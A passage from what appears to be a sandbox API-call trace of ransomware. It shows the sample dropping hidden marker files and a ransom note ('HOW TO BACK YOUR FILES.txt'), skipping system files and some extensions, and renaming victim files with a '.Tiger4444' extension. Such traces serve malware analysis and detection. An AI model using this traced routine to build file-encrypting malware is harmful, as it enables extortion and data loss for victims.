lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7b7983c6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7b7983c6, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sonar", cAlternateFileName="")) returned 0 [0058.311] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0058.311] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0058.311] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0058.311] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0058.311] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0058.312] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0058.312] CloseHandle (hObject=0x2b8) returned 1 [0058.312] CloseHandle (hObject=0x2c4) returned 1 [0058.312] GetCurrentThreadId () returned 0xfa8 [0058.312] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc665c8 [0058.312] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar" [0058.312] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc60fe8 | out: hHeap=0xc50000) returned 1 [0058.312] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc665c0 | out: hHeap=0xc50000) returned 1 [0058.312] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar" [0058.312] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\" [0058.312] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\.BFC0E91B00AE8A0620D3" [0058.312] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\sonar\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0058.314] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0058.320] FlushFileBuffers (hFile=0x2c4) returned 1 [0058.321] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0058.321] CloseHandle (hObject=0x2c4) returned 1 [0058.322] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar") returned 43 [0058.322] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.322] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7b7983c6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x87c615d4, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0058.322] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.322] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.322] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0058.322] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.322] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7b7983c6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x87c615d4, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.322] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.323] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.323] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0058.323] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.323] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.323] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x87c615d4, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x87c615d4, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x87c8783f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0058.323] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.323] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0058.323] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x86e93380, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x86e93380, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sonar1.0", cAlternateFileName="")) returned 1 [0058.323] lstrcmpiW (lpString1="Sonar1.0", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0058.323] lstrcmpiW (lpString1="Sonar1.0", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.323] lstrcmpiW (lpString1="Sonar1.0", lpString2="Tiger4444.exe") returned -1 [0058.323] lstrcmpiW (lpString1="Sonar1.0", lpString2=".") returned 1 [0058.323] lstrcmpiW (lpString1="Sonar1.0", lpString2="..") returned 1 [0058.323] lstrcmpiW (lpString1="Sonar1.0", lpString2="windows") returned -1 [0058.323] lstrcmpiW (lpString1="Sonar1.0", lpString2="bootmgr") returned 1 [0058.323] lstrcmpiW (lpString1="Sonar1.0", lpString2="pagefile.sys") returned 1 [0058.323] lstrcmpiW (lpString1="Sonar1.0", lpString2="boot") returned 1 [0058.323] lstrcmpiW (lpString1="Sonar1.0", lpString2="ids.txt") returned 1 [0058.323] lstrcmpiW (lpString1="Sonar1.0", lpString2="NTUSER.DAT") returned 1 [0058.323] lstrcpyW (in: lpString1=0x30aeb00, lpString2="Sonar1.0" | out: lpString1="Sonar1.0") returned="Sonar1.0" [0058.323] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666c0 [0058.323] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6a) returned 0xc898d8 [0058.323] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc666c8 | out: ListHead=0xc66828, ListEntry=0xc666c8) returned 0xc66668 [0058.323] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x86e93380, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x86e93380, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sonar1.0", cAlternateFileName="")) returned 0 [0058.323] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0058.327] lstrcpyW (in: lpString1=0x30aeb00, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0058.327] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\sonar\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0058.328] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0058.328] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0058.329] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0058.329] CloseHandle (hObject=0x2b8) returned 1 [0058.329] CloseHandle (hObject=0x2c4) returned 1 [0058.329] GetCurrentThreadId () returned 0xfa8 [0058.329] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc666c8 [0058.329] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0" [0058.329] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0058.329] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc666c0 | out: hHeap=0xc50000) returned 1 [0058.329] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0" [0058.329] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\" [0058.329] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\.BFC0E91B00AE8A0620D3" [0058.329] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0058.343] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0058.346] FlushFileBuffers (hFile=0x2c4) returned 1 [0058.355] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0058.355] CloseHandle (hObject=0x2c4) returned 1 [0058.356] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0") returned 52 [0058.356] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.356] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x86e93380, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x87c8783f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0058.356] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.356] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.356] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0058.356] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.356] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x86e93380, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x87c8783f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.357] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.357] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.357] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0058.357] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.357] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.357] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x87c8783f, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x87c8783f, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x87cadace, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0058.357] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.357] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0058.357] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e93380, ftCreationTime.dwHighDateTime=0x1d327cd, ftLastAccessTime.dwLowDateTime=0x86e93380, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x64c770e4, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x4949, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sonar_policy.xml", cAlternateFileName="SONAR_~1.XML")) returned 1 [0058.357] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0058.357] lstrcmpiW (lpString1="sonar_policy.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.357] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="Tiger4444.exe") returned -1 [0058.357] lstrcmpiW (lpString1="sonar_policy.xml", lpString2=".") returned 1 [0058.357] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="..") returned 1 [0058.357] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="windows") returned -1 [0058.357] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="bootmgr") returned 1 [0058.357] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="pagefile.sys") returned 1 [0058.357] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="boot") returned 1 [0058.357] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="ids.txt") returned 1 [0058.357] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="NTUSER.DAT") returned 1 [0058.357] lstrcpyW (in: lpString1=0x30aeb12, lpString2="sonar_policy.xml" | out: lpString1="sonar_policy.xml") returned="sonar_policy.xml" [0058.357] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml", dwFileAttributes=0x0) returned 1 [0058.378] lstrlenW (lpString="sonar_policy.xml") returned 16 [0058.378] lstrlenW (lpString="Tiger4444") returned 9 [0058.378] lstrcmpiW (lpString1="olicy.xml", lpString2="Tiger4444") returned -1 [0058.378] lstrlenW (lpString=".dll") returned 4 [0058.378] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0058.378] lstrlenW (lpString=".lnk") returned 4 [0058.378] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0058.378] lstrlenW (lpString=".ini") returned 4 [0058.378] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0058.378] lstrlenW (lpString=".sys") returned 4 [0058.378] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0058.378] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\sonar_policy.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0058.379] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0058.379] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14983179575) returned 1 [0058.379] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=18761) returned 1 [0058.379] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0058.379] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0058.379] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4c50, lpName=0x0) returned 0x2cc [0058.383] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4c50) returned 0xbe0000 [0058.397] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0058.397] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0058.397] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0058.397] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0058.397] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0058.397] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0058.397] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0058.398] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0058.398] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14985070592) returned 1 [0058.398] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0058.398] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0058.398] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0058.398] CloseHandle (hObject=0x2cc) returned 1 [0058.398] CloseHandle (hObject=0x2b8) returned 1 [0058.398] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml.Tiger4444") returned 79 [0058.398] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\sonar_policy.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\sonar_policy.xml.tiger4444"), dwFlags=0x1) returned 1 [0058.399] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e93380, ftCreationTime.dwHighDateTime=0x1d327cd, ftLastAccessTime.dwLowDateTime=0x86e93380, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x64c770e4, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x4949, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sonar_policy.xml", cAlternateFileName="SONAR_~1.XML")) returned 0 [0058.399] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0058.399] lstrcpyW (in: lpString1=0x30aeb12, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0058.399] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0058.423] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0058.423] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0058.424] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0058.424] CloseHandle (hObject=0x2b8) returned 1 [0058.424] CloseHandle (hObject=0x2c4) returned 1 [0058.424] GetCurrentThreadId () returned 0xfa8 [0058.424] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66668 [0058.424] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2" [0058.424] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8f3f0 | out: hHeap=0xc50000) returned 1 [0058.424] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66660 | out: hHeap=0xc50000) returned 1 [0058.424] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2" [0058.425] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\" [0058.425] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\.BFC0E91B00AE8A0620D3" [0058.425] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\logtransport2\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0058.428] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0058.432] FlushFileBuffers (hFile=0x2c4) returned 1 [0058.433] SetFileAttributesW 